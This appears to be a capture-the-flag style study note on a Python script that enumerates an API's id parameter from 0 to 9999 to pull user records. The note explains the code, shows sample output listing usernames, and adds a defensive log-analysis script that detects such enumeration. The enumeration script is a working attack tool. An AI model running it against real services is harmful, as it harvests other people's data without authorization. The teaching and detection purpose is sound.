PARAM-FUZZER.PY
This script automates the enumeration of valid parameter values.
root@oco:~$ nano parameterFuzzer.py
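import requests, sys

def brute():
    try:
        # Candidate id values to try: 0 through 9999
        value = range(10000)
        for val in value:
            # Base URL comes from the first command-line argument
            url = sys.argv[1]
            r = requests.get(url + '/?id='+str(val))
            # A valid id returns a record containing "position"; an invalid one returns []
            if "position" in r.text:
                print("Number found!", val)
                print(r.text)
    except IndexError:
        # Raised when no URL argument was supplied
        print("Enter a URL E.g.: http://<TARGET IP>:3003/")

brute()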
* The requests module is used to make HTTP requests (GET, POST, etc.).
* The sys module is used to read command-line arguments.
* url = sys.argv[1] receives the first argument.
* r = requests.get(url + '/?id='+str(val)) creates a response object called r,
which lets us read the response to our GET request. We append /?id= to the URL,
followed by val, which takes each value in the specified range.
* if "position" in r.text: looks for the string position in the response. If we
enter a valid ID, the response contains the position and other information. If we
don't, it returns [].
root@oco:$ python3 brute_api.py http://<TARGET IP>:3003
Number found! 1
[{"id":"1","username":"admin","position":"1"}]
Number found! 2
[{"id":"2","username":"HTB-User-John","position":"2"}]
...
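From the defender's side, the run of /?id= requests this script produces stands out in web server access logs. The following is an added example, not part of the original notes: it flags clients that request many distinct id values inside a short time window. The combined-log line format, the IP addresses, the response sizes and the thresholds are assumptions, and the sample log lines are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed access-log layout: ip - - [timestamp] "GET /?id=N HTTP/1.1" status size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "GET /\?id=(?P<id>[^ &"]+) HTTP/[\d.]+"')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def find_id_enumeration(lines, window=timedelta(seconds=60), max_distinct=20):
    """Return {ip: distinct_ids} for clients that requested more than
    max_distinct different id values inside one sliding time window."""
    recent = defaultdict(deque)   # ip -> (timestamp, id) pairs still in the window
    flagged = {}
    for line in lines:            # lines are expected in chronological order
        m = LINE_RE.match(line)
        if not m:
            continue              # not a /?id= request, or unparseable
        ts = datetime.strptime(m["ts"], TS_FMT)
        q = recent[m["ip"]]
        q.append((ts, m["id"]))
        while ts - q[0][0] > window:   # drop requests older than the window
            q.popleft()
        distinct = len({i for _, i in q})
        if distinct > max_distinct:
            flagged[m["ip"]] = max(distinct, flagged.get(m["ip"], 0))
    return flagged

def build_sample_log():
    """Constructed log lines: one client walking id=0..99, one ordinary user."""
    start = datetime.strptime("01/Jan/2024:10:00:00 +0000", TS_FMT)
    fmt = '{ip} - - [{ts}] "GET /?id={id} HTTP/1.1" 200 {size}'
    events = []
    for n in range(100):          # ten requests per second, sequential ids
        size = 46 if n in (1, 2) else 2    # constructed sizes; 2 bytes = "[]"
        events.append((start + timedelta(seconds=n // 10), "198.51.100.7", n, size))
    for k, n in enumerate([2, 2, 1, 2]):   # ordinary user, one request a minute
        events.append((start + timedelta(minutes=k), "192.0.2.10", n, 46))
    events.sort(key=lambda e: e[0])
    return [fmt.format(ip=ip, ts=t.strftime(TS_FMT), id=n, size=s)
            for t, ip, n, s in events]

if __name__ == "__main__":
    for ip, count in find_id_enumeration(build_sample_log()).items():
        print(f"{ip}: {count} distinct id values within 60 s")
```

Rate limiting and an authorization check on each id lookup address the underlying exposure; the log check only surfaces the enumeration after the fact.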